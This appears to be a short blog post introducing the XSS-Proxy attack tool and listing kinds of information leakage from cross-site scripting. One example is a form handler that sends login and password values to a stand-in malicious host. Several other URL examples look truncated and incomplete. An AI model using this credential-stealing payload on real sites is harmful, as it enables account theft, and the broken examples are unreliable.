/home/mb3e/

♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Cross Site Scripting Attack Tool

XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.
Types of information leakage due to XSS attack
1. Client can reveal cookies to 3rd party (session state, order info, etc)
http://host/a.php?variable=">
2. Client can reveal posted form items to 3rd party (userID/passwd, etc)
action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src=’http://www.malicioussite.com/’+document.forms(1).login.value’+':’+ document.forms(1).password.value;"

3. Client can be tricked into accessing/posting spoofed info to trusted server
http://www.trustedserver.com/xss.asp?name">www.trustedserver.com/xss.asp?name =
4. Client can be tricked into attacking other sites
/hello.asp?name =
 

0 comments:

Post a Comment

silahkan tinggalkan komentar anda disini .. :D

Subscribe to: Post Comments (Atom)